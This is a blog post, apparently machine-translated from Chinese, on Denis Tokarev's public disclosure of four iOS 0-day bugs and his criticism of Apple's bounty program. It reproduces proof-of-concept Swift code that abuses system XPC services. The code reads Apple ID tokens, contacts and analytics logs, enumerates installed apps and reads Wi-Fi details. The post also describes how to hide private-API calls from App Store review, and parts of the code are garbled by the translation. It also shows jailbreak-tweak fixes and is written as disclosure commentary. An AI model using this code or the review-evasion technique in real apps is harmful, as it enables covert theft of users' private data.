One, foreword
Hello everyone, today we come to eat an Apple system vulnerability melon!
On September 24, Denis Tokarev published an article about four 0-Day iOS bugs. He joked that Apple didn’t thank him for not signing it, and the most important thing was that Apple didn’t pay a bounty!
Here is the author’s information:
- Twitter: Denis Tokarev
- Making: illusionofchaos
- Disclosure of three 0-day iOS christians and Critique of Apple Security Bounty program / х бр а
Ii. The story
Denis Tokarev is the real name of the researcher under illusionofChaos. There is not much information about Denis Tokarev, but he is suspected to be Russian through his Website using Russian.
The author claims to have reported four 0-day vulnerabilities to Apple between March 10 and May 4 this year, but so far, only one has been fixed in iOS 14.7, which was not disclosed in Apple’s iOS 14.7 security update page! When the author raised questions with Apple Product Security, they promised to list them on the page for the next system version update, but they were not listed in the three subsequent releases. So the author is furious! Decided to disclose! Just have today this earth – shaking news (melon)!
0 – day
Vulnerability 0day, zero-day vulnerability, 0-day vulnerability, zero-day vulnerability or zero-hour vulnerability
A zero-day attack is a security vulnerability that can be exploited maliciously immediately after it is discovered. Colloquially speaking, that is, security patches and flaws exposed the same day, the associated malicious programs appear. Patches are provided by the original software distribution company, but this method is usually slower, so software companies often provide features in the latest virus code to circumvent known zero-time attacks, but do not fully address the vulnerability itself. This kind of attack is often very sudden and destructive.
,
IOS 14.7 was released on July 19, 2021; On October 11, 2021, apple released iOS 15.0.2 and fixed another bug.
Next, we will first analyze the hazards of these four vulnerabilities, and then discuss Apple’s security bounty program. Finally, we will discuss iOS security in some ways.
IOS Analyticsd pre – 14.7 exploits
The bug was fixed in iOS 14.7.
Vulnerability role
Allow any user installed app to access analysis logs (Settings -> Privacy -> Analysis and Improvement -> Logs in Analysis Data), which include (but are not limited to) :
- Medical information (heart rate, count of detected atrial fibrillation, and arrhythmia events)
- Menstrual cycle length, biological sex and age, whether the user records sexual activity, cervical mucus quality, etc.
- Device usage information (device pickup, push notification count, user actions in different situations, etc.)
- Screen usage time information and session count for all applications with their respective Bundle IDS
- Information about equipment accessories and their manufacturers, models, firmware versions, and user assigned names
- The application crashes with the bundle ID and exception code
- The language of the web page viewed by the user in Safari
Holes that
This vulnerability means that app can obtain analysis logs without any permission, and analysis logs are available in every system, so there will definitely be sensitive information. In the meantime, the authors note that all of this data is still being collected even when “shared analytics” is turned off in Settings. On this point, xiaobian did not verify, interested friends can verify.
This vulnerability has been fixed in iOS 14.7, so here are a few examples of MotionUsageMetrics data for testing on iOS 14.2 devices:
Vulnerability code
Vulnerability attack example source code: GitHub
func analyticsJson(a) -> String {
let connection = xpc_connection_create_mach_service("com.apple.analyticsd".nil.2)
xpc_connection_set_event_handler(connection, { _ in })
xpc_connection_resume(connection)
let xdict = xpc_dictionary_create(nil.nil.0)
xpc_dictionary_set_string(xdict, "command"."log-dump")
let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
return String(cString: xpc_dictionary_get_string(reply, "log-dump"))}Copy the codeXPC
XPC is a Mach-based IPC (interprocess communication) technology in macOS and iOS that implements permission isolation and makes the App Sandbox more complete. Note that on iOS, the API is private. To put it simply, the system encapsulates many XPC services. One XPC provides interprocess communication services, and all APPS can access this service. For details about API functions and descriptions, please refer to the following links:
- XPC | Apple Developer Documentation
- XPC Connections | Apple Developer Documentation
- XPC · objc. IO
- ObjC China-xPC
Vulnerability analysis
Knowing the basic concept of XPC, the above source code, you should be able to guess some. It is through the XPC service com.apple.analyticsd of Apple system. Because Apple does not have the authentication permission, all apps can access this XPC service.
Source code interpretation:
func analyticsJson(a) -> String {
// Suggest an XPC connection for com.apple.analyticsd
let connection = xpc_connection_create_mach_service("com.apple.analyticsd".nil.2)
// Handle various events in connection
xpc_connection_set_event_handler(connection, { _ in })
// The resume method must be called to start
xpc_connection_resume(connection)
// Create an XPC parameter passing dictionary
let xdict = xpc_dictionary_create(nil.nil.0)
// The key is command and the value is log-dump
xpc_dictionary_set_string(xdict, "command"."log-dump")
// Send a message
let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
// Read the result
return String(cString: xpc_dictionary_get_string(reply, "log-dump"))}Copy the codeIf you need to run the source code, note that the C function methods in the project’s C.C code file need to be modified to look like this:
void * normal_function1(const char * arg1, int arg2) {
return ((void* (*) (const char *, int)) ((long long)dlopen))(arg1, arg2);
}
void * normal_function2(void * arg1, const char * arg2) {
return ((void* (*) (void *, const char*)) ((long long)dlsym))(arg1, arg2);
}
Copy the codeReporting schedule
- April 29, 2021: Sends a detailed report to Apple
- April 30, 2021: Apple replies that it has reviewed the report and accepted an investigation
- May 20, 2021: Asks Apple for status update (received no reply)
- May 30, 2021: Request status update from Apple
- June 3, 2021: Apple replies that they plan to fix the issue in an upcoming update
- July 19, 2021: iOS 14.7 released and fixed
- July 20, 2021: I have requested a status update from Apple
- 21 July 2021: iOS 14.7 Security Content list released without mentioning this vulnerability (support.apple.com/zh-cn/HT212…)
- 22 July 2021: Asked Apple a question, why isn’t the bug on the list
- On the same day, I received the following reply: Due to a processing issue, your contribution will be included in the security page in an upcoming update. We apologize for the inconvenience.
- 26 July 2021: iOS 14.7.1 Security content list released, still no mention of this vulnerability (support.apple.com/zh-cn/HT212…
- September 13, 2021: iOS 14.8 Security content list released, still no mention of this vulnerability (support.apple.com/zh-cn/HT212…
- September 20, 2021: iOS 15.0 security content list released, still no mention of this vulnerability (support.apple.com/zh-cn/HT212…
- September 24, 2021: I still haven’t received any reply
From this long report time, apple did not fulfill its promise, we can feel that the contribution did not get praise, for the author is a painful event.
IOS Gamed exploits (Fixed in 15.0.2)
The bug was fixed in iOS 15.0.2.
Vulnerability role
Any App installed from the App Store can access the following data without the user’s permission:
- Apple ID E-mail and the full name associated with it
- An Apple ID authentication token that allows access to at least one endpoint on *.apple.com on behalf of the user
- The complete file system reads access to the Core Duet database (containing lists of contacts forwarded by mail, SMS, iMessage, third-party apps, and metadata (including timestamps and statistics) of all user interactions with those contacts, as well as attachments (such as urls and text))
- The full file system reads access to the Speed Dial database and Address Book database, including contact profile pictures and other metadata such as creation and modification dates (I just checked on iOS 15 and this is not accessible, so it must have been quietly fixed recently)
Holes that
This vulnerability can read the contents of Core Duet, Speed Dial, and Address Book databases without any permissions. If you need to read the user’s Apple ID email, you need to turn it on with Settings -> GameCenter on.
Run example:
Vulnerability code
Vulnerability attack example source code: GitHub
let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _._._._._._._, utilityService, _._._._) in
accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
let appleID = response.credential.accountName
let token = response.credential.authenticationToken
}
utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
let addressBookData = data
}
}
Copy the codeVulnerability analysis
The root cause of the bug is that the XPC service com.apple.gamed does not correctly check whether the app has com.apple.developer.game-center permission.
1, even if the user devices to disable the Game Center, call getServicesForPID: localPlayer: reply: The method also returns several XPC proxy objects (GKAccountService, GKFriendService, GKUtilityService, and so on).
2. If Game Center is enabled on the user’s device (even if it does not enable this permission for the App in apple background App Store Connect and the App does not include com.apple.developer.game-Center license).
- in
GKAccountServiceOn the callauthenticatePlayerWithExistingCredentialsWithHandler:An object user, DSID, and Game Center authentication token containing the Apple ID is returnedgc.apple.comSend the request). - in
GKProfileServiceOn the callgetProfilesForPlayerIDs:handler:Returns an object containing the user’s Apple ID first and last name. - in
GKFriendServiceOn the callgetFriendsForPlayer:handler:Returns an object that contains information about the user’s friends in Game Center.
3. Even if Game Center is disabled on the device, this permission is not enabled in the Apple background for the App in App Store Connect, and the App does not include com.apple.developer.game-Center authorization. Call GKUtilityService requestImageDataForURL: subdirectory: fileName: handler: allows the application sandbox, read arbitrary files through the file URL passed to the method. The files that can be accessed in this way (but not limited to) are as follows:
/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist: contains information from About Phone in Settings. Jailbreaking devices can modify the device version number and change the device version such as The Japanese version and the American version to the international version by modifying this file./var/mobile/Library/CoreDuet/People/interactionC.db: contains contact lists from email, SMS, iMessage, third-party app delivery, and metadata (including timestamps and statistics) about user interactions with these contacts/var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist: Contains personal contact information and phone numbers./var/mobile/Library/AddressBook/AddressBook.sqlitedb: Contains complete address book information./var/mobile/Library/AddressBook/AddressBookImages.sqlitedb: Contains the profile picture of a contact in the address book.
Call on GKUtilityService cacheImageData: inSubdirectory: withFileName: handler: may allow arbitrary data to app location outside the sandbox.
The timeline of the report
March 10, 2021: Bug reported to Apple March 10, 2021: Apple confirms my report May 20, 2021: Requested status update (but received no reply) May 30, 2021: Requested status update again July 1, 2021: Apple replies that they are still investigating July 20, 2021: Request status update again August 25, 2021: Apple replies that they plan to fix the issue in an upcoming update.
Nehelper Enumerate Installed apps 0-day (still works in 15.0.2)
The bug has not been fixed in iOS 15.0.2.
Vulnerability role
This vulnerability allows any user-installed application to determine whether any application is installed on the device based on the bundle ID.
Holes that
This vulnerability does not require any permissions to determine whether the device has an APP installed.
Run example:
Vulnerability code
Vulnerability attack example source code: GitHub
func isAppInstalled(bundleId: String) -> Bool {
let connection = xpc_connection_create_mach_service("com.apple.nehelper".nil.2)!
xpc_connection_set_event_handler(connection, { _ in })
xpc_connection_resume(connection)
let xdict = xpc_dictionary_create(nil.nil.0)
xpc_dictionary_set_uint64(xdict, "delegate-class-id".1)
xpc_dictionary_set_uint64(xdict, "cache-command".3)
xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId)
let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") ! = nil {
return true
}
return false
}
Copy the codeVulnerability analysis
This code should be readable based on the previous parsing. The principle is that the XPC service com.apple.nehelper has a method that can access any application. This method takes the Bundle ID as a parameter and returns an array containing some cache UUID if an application with a matching Bundle ID is installed on the device, otherwise it returns an empty array. It is executed in the -[NEHelperCacheManager onQueueHandleMessage:] method of /usr/libexec/nehelper.
The timeline of the report
- May 4, 2021: Vulnerability reported to Apple
- May 4, 2021: Apple confirms my report
- May 20, 2021: Request for status update (received no reply)
- July 20, 2021: Status update requested again
- August 12, 2021: Apple replies that it is still investigating
Nehelper Wifi Info 0-day (still works in 15.0.2)
The bug has not been fixed in iOS 15.0.2.
Vulnerability role
This vulnerability allows an app with location access to read the SSID and BSSID information of the current device connected to Wi-Fi.
Holes that
This vulnerability requires the APP to obtain the SSID and BSSID information of the device currently connected to Wi-Fi after obtaining the location permission of the precise location.
Run example:
Vulnerability code
Vulnerability attack example source code: GitHub
func wifi_info(a) -> String? {
let connection = xpc_connection_create_mach_service("com.apple.nehelper".nil.2)
xpc_connection_set_event_handler(connection, { _ in })
xpc_connection_resume(connection)
let xdict = xpc_dictionary_create(nil.nil.0)
xpc_dictionary_set_uint64(xdict, "delegate-class-id".10)
xpc_dictionary_set_uint64(xdict, "sdk-version".1) // may be omitted entirely
xpc_dictionary_set_string(xdict, "interface-name"."en0")
let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
if let result = xpc_dictionary_get_value(reply, "result-data") {
let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
return "SSID: \(ssid)\nBSSID: \(bssid)"
} else {
return nil}}Copy the codeVulnerability analysis
XPC service com. Apple. Nehelper accept user provide the parameters of the SDK version, if its value is less than or equal to 524288, skip the app com.apple.developer.net working. The wifi – info check permissions. This allows any qualified application (for example, providing location access) to access Wifi information without the required permissions. This is done in the /usr/libexec/nehelper -[NEHelperWiFiInfoManager checkIfEntitled:] method.
The timeline of the report
- May 2, 2021: Vulnerability reported to Apple
- May 4, 2021: Apple confirms my report
- May 20, 2021: Request for status update (received no reply)
- July 20, 2021: Status update requested again
- August 6, 2021: Apple replies that it is still investigating
Apple Security Bounty program
The Apple Security Bounty program rewards researchers who share critical security issues.
- Apple Security Bounty
Researchers who report problems on iOS, iPadOS, macOS, Apple tvOS, watchOS and iCloud can earn up to $1.5 million. In addition, Apple publicly acknowledges those who submit valid reports. If the winner donates the prize money, Apple will also donate an equivalent amount to eligible charities.
The authors argue that illusionofchaos/ios-gamed-0day: IOS Gamed Exploit (Fixed in 15.0.2) vulnerability, estimated at $100,000 according to the Apple Security Bounty Program page (wide application access to sensitive data that is usually protected by TCC tips or platform sandboxes). “Sensitive data” access involves gaining extensive access from contacts (that is, the full database).
TCC prompt (protected by a TCC Prompt) is used to manage permissions in the Privacy TAB under Security and Privacy in macOS system Settings.
The author says he’s not the first person to be unhappy with Apple’s security bounty program. Here are some other reports and comments:
- Therecord. Media/researcher -…
- Wojciechregula. Blog/post/change…
- Medium.com/macoclock/a…
- Thezerohack.com/apple-vulne…
- www.imore.com/developer-f…
- Gigazine.net/gsc_news/en…
- Zemnmez.medium.com/how-to-hack…
- Theevilbit. Making. IO/posts/exper…
- Twitter.com/5n1p3r0010/…
- Twitter.com/theevilbit/…
- Twitter.com/osxreverser…
Vulnerability hazard
First, from the above analysis, the most damaging XPC “com.apple.gamed” vulnerability has been fixed in iOS 15.0.2, but devices under 15.0.1 can be understood as insecure devices. Therefore, the harm is self-evident.
In addition, the author said that he doubted whether the above vulnerability code would make it into the App Store because Of Apple’s strict machine and human review. The author refutes.
Imagine that the government of a country where homosexuality is punishable by death has an official App in App Stor E, available to most of its citizens, and wants to target people based on their sexual orientation. This can be done, for example, by checking whether the Grindr application is installed on the user’s device. Governments could hide malicious code in their official apps and send updates to the App Store, which Apple would not be able to detect.
As you all know, packages uploaded to the App Store are statically parsed, checking the list of strings in the binary against a set of predefined private apis, but if the API is objective-C, it can be invoked dynamically through the Objective-C runtime.
In the publicly available source code for the vulnerability, the authors show examples of dynamically calling C functions that Apple considers to be part of a private API, so as not to be detected by static analysis. Sample code:
let dylib = normal_function1(["/usr/lib/system/libxp".".dylib"].joined(separator: "c"), 0)
let normalFunction3 = unsafeBitCast(normal_function2(dylib, ["xp"."_connection_create_mach_service"].joined(separator: "c")), to: (@convention(c) (UnsafePointer<CChar>, DispatchQueue? .UInt64) - > (OpaquePointer)).self)
let normalFunction4 = unsafeBitCast(normal_function2(dylib, ["xp"."_connection_set_event_handler"].joined(separator: "c")), to: (@convention(c) (OpaquePointer.@escaping (OpaquePointer) - >Void) - >Void).self)
Copy the codeThe dlopen and DLSYM system library functions, which allow dynamic libraries to be loaded and symbols to be parsed. The use of these features may be detected by the App Store review team, but the authors say you can avoid using them directly. Because every iOS binary has a symbol called dyLD_STUB_binder, it is imported from the same libraries as DLOpen and DLSYM. This means we can find where dyLD_STUB_Binder is in memory away from Dlopen and DLSYM and call them using only their addresses. So we’ll calculate the offset ahead of time for a particular iOS version and device model (see the c.C file in the source code) :
printf("%lld\n", (long long)dyld_stub_binder - (long long)dlopen);
printf("%lld\n", (long long)dyld_stub_binder - (long long)dlsym);
Copy the codeMore sophisticated malware can avoid using predefined offsets and use the signatures of these functions to dynamically look up addresses. Here will not expand, interested friends can know about FFI.
Of course, strings containing function names should be obfuscated in order not to be detected by static analysis. More can be written articles.
Bug fix
As for bug fixes, as mentioned earlier, if you’re running a version earlier than iOS 15.0.2, it’s probably best to turn Off Game Center, don’t give “exact location” permissions, and upgrade to the latest system as much as possible.
Of course, unknown links received and apps not installed by AppStore are also very risky. As we know from the above, your information may have been obtained without your permission. Of course, if you think it’s just basic information, you’re probably careless. If there is a loophole in the system, you may get the verification code of your SMS APP, then your mobile phone number + verification code, these potential risk awareness, perhaps every intelligent user today should understand to protect their equipment, but also to protect their information property security.
4 bugs, 2 bugs apple didn’t fix, and then a developer took to Reddit to say he made a jailbreak plugin to fix the bug!
Specific plug-in source code, can be seen at Rllbe/cue Fix: Workaround for the 40 0-days:
%hook GKAccountService
-(void)authenticatePlayerWithExistingCredentialsWithHandler:(void(^)(GKAuthenticateResponse *, NSError *))handler {
void (^_handler)(GKAuthenticateResponse *, NSError *) = ^(GKAuthenticateResponse *response, NSError *error) {
if(response && ! [[[self clientProxy] entitlements] hasEntitlements:[%c(GKAccountServicePrivate) requiredEntitlements]]) { response.credential = nil;
response.passwordChangeURL = nil;
}
handler(response, error);
};
%orig(_handler);
}
%end
Copy the codeHere is a fix for the “com.apple.gamed” vulnerability, adding the right to verify that the current code object has XPC service before retrieving data.
This is a fix for determining whether or not to install an app:
%hook NEHelperCacheManager
-(void)onQueueHandleMessage:(xpc_object_t)xdict {
if (xpc_dictionary_get_uint64(xdict, "cache-command") = =3uLL) {
Class NEHelperServer = %c(NEHelperServer);
if(! [NEHelperServer verifyConnection:xpc_dictionary_get_remote_connection(xdict) hasEntitlement:"com.apple.private.nehelper.privileged"]) {
[NEHelperServer sendReplyForMessage:xdict result:22LL data:0LL];
return; }}return %orig;
}
%end
Copy the codeFix wifi message vulnerability:
%hook NEHelperWiFiInfoManager
-(BOOL)checkIfEntitled:(NSUInteger)sdkVersion {
NSUInteger _sdkVersion = sdkVersion <= 1 << 19 ? 1 << 19 : sdkVersion;
return %orig(_sdkVersion);
}
%end
Copy the codePerhaps, this is also the advantage of jailbreaking, itself is the use of system vulnerability, and finally for the system to fix the vulnerability, also do not need to upgrade the system to repair. Sounds like a joke
conclusion
After eating melon, I believe there are many loopholes, have not been disclosed! Or someone found out about it!
Apple’s bug bounty program, which I won’t comment on here, is a “win-win” for security researchers, except that other big companies have similar programs. However, large enterprises tend to follow a standardized process, so Apple did not respond to the allegations or did not respond in a timely manner. In fact, Apple’s slow response can also be felt in ordinary times. Of course, Apple’s review of payment compliance with the bounty program may be an opaque issue. All of this led to the author’s disclosure of $100,000 worth of loopholes!
From this incident, let us know that the security problem is never a small thing, and when the user information leakage, may also have a direct relationship with the user. The problem of iOS security, from these 4 vulnerabilities shows that, just the tip of the iceberg, iOS security is only relative, so, from the user’s point of view, do not click on the unknown link, do not install the unknown app, try to update to the latest system, may be more secure.
Refer to the reference
- Disclosure of three 0-day iOS bypassed and critique of Apple Security Bounty program / х бр а
- How malware gets into the App Store and why Apple can’t stop that / х бр а
- Denis Tokarev (@illusionofcha0s) / Twitter
- Illusionofchaos /ios-gamed-0day: ios gamed exploits (fixed in 15.0.2)
- Illusionofchaos/ios-Nehelper -enum-apps- 0Day: ios 15 0-day Exploits (Still works in 15.0.2)
- Illusionofchaos/ios-Nehelper – wifi-info-0Day: ios 15 0-day exploits (Still works in 15.0.2)
- Illusionofchaos/ios-analyticSD-pre14.7 – Exploit: Ios exploit (Fixed in 14.7)
- XPC | Apple Developer Documentation
- XPC Connections | Apple Developer Documentation
- XPC · objc. IO
- ObjC China-xPC
- Security for iOS 14.7 and iPadOS 14.7 – Apple Support (China)
- Apple Security Update – Apple Support (China)
- Zero-day attack – Wikipedia, the free encyclopedia
- Apple Security Bounty – Apple Developer
- Apple Security Bounty – Payouts – Apple Developer
- Reporting Security or Privacy Vulnerabilities – Apple Support (China)
- [Free Release] EntitlementFix: Workaround for the 3 zero-day exploits posted here today : jailbreak
- rllbe/entitlementfix: Workaround for the 4 0-days
- Jailbreak #001: Gamed 0-day vulnerability
- MacOS is finally starting to fix a big hole in XPC
- Can macOS TCC still protect users’ privacy
- Apple has fixed a zero-day bug in the official release of iOS 15.0.2, but not thanks to security researcher IT Home
- White hat hacker Slipper has completed the world’s first public remote jailbreak of apple’s iPhone 13 Pro in just one second – IT Home
- Macos 10.15.3 RCE
- [Discussion] So apparently 3 zero-day exploits have been released. : jailbreak